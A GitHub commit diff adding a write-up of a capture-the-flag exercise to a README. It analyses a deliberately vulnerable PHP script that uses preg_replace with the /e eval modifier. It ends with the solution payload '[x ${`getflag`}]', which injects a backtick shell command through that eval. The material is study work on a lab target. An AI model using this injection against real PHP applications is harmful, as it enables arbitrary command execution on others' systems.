Skip to content

Commit

Permalink
show READMEs daily
Browse files Browse the repository at this point in the history
  • Loading branch information
nuoxoxo committed Nov 18, 2024
1 parent 61884db commit 27311e0
Showing 1 changed file with 43 additions and 4 deletions.
47 changes: 43 additions & 4 deletions README.mdx
Original file line number Diff line number Diff line change
Expand Up @@ -482,21 +482,60 @@ function y($m) {
$m = preg_replace("/@/", " y", $m);
return $m;
}
function x($y, $z) {
$a = file_get_contents($y);
$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
$a = preg_replace("/\[/", "(", $a);
$a = preg_replace("/\]/", ")", $a);
return $a;
}
$r = x($argv[1], $argv[2]);
print $r;
?>
```

$r = x($argv[1], $argv[2]); print $r;
Inspect `y` function

?>
```b
function y($m) {
$m = preg_replace("/\./", " x ", $m);
$m = preg_replace("/@/", " y", $m);
return $m;
}
```

🟡 notes in `sea`
Notes - function y filters m twice
1. `" x "` replaces all regex `/./`
2. `" y"` replaces all regex `/@/`

Inspect `x` function

```b
function x($y, $z) {
$a = file_get_contents($y);
$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
$a = preg_replace("/\[/", "(", $a);
$a = preg_replace("/\]/", ")", $a);
return $a;
}
```

Notes - function x filters `argv[1]`
1. `"/(\[x (.*)\])/e"`
- matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")`
- `/e` will eval the `y(\"\\2\")` as PHP code
- :yellow_circle: `/e` modifier only evaluates the replacement string we provide
- :yellow_circle: `/e` is deprecated long ago
2. `(` and `)` replace all `[` and `]` in the result respectively
- the func disregards argv[2]

Solution
- figure one way
- ```[x ${`getflag`}]```
- `${`getflag`}` captured
- ````getflag```` the backticks = doing `shell_exec()`
- `${ret}`



# 07 - Todo
Expand Down

0 comments on commit 27311e0

Please sign in to comment.